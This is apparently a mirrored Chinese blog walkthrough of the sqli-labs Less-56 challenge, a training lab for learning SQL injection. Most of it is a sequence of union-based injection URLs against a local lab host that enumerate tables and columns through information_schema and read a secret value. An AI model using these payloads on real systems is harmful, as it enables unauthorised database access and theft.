zoukankan      html  css  js  c++  java
  • 【sqli-labs】 less56 GET -Challenge -Union -14 queries allowed -Variation3 (GET型 挑战 联合查询 只允许14次查询 变化3)

    单引号括号闭合

    http://192.168.136.128/sqli-labs-master/Less-56/?id=1')%23

    http://192.168.136.128/sqli-labs-master/Less-56/?id=0') union  select 1,2,database()%23

     

    http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23

    http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='58ONMY4BZG'%23

     

    http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0') union select 1,secret_HD4U,3 from 58ONMY4BZG limit 0,1%23

     

     

  • 相关阅读:
    定时器
    SysTick
    13.看门狗
    12.FSMC
    11.中断
    ##HTML行内块元素好迷啊!!
    ##HTML基础
    ##CS3动画效果
    ##管家婆项目(tools层)
    ##管家婆项目(app层)
  • 原文地址:https://www.cnblogs.com/omnis/p/8393602.html
Copyright © 2011-2022 走看看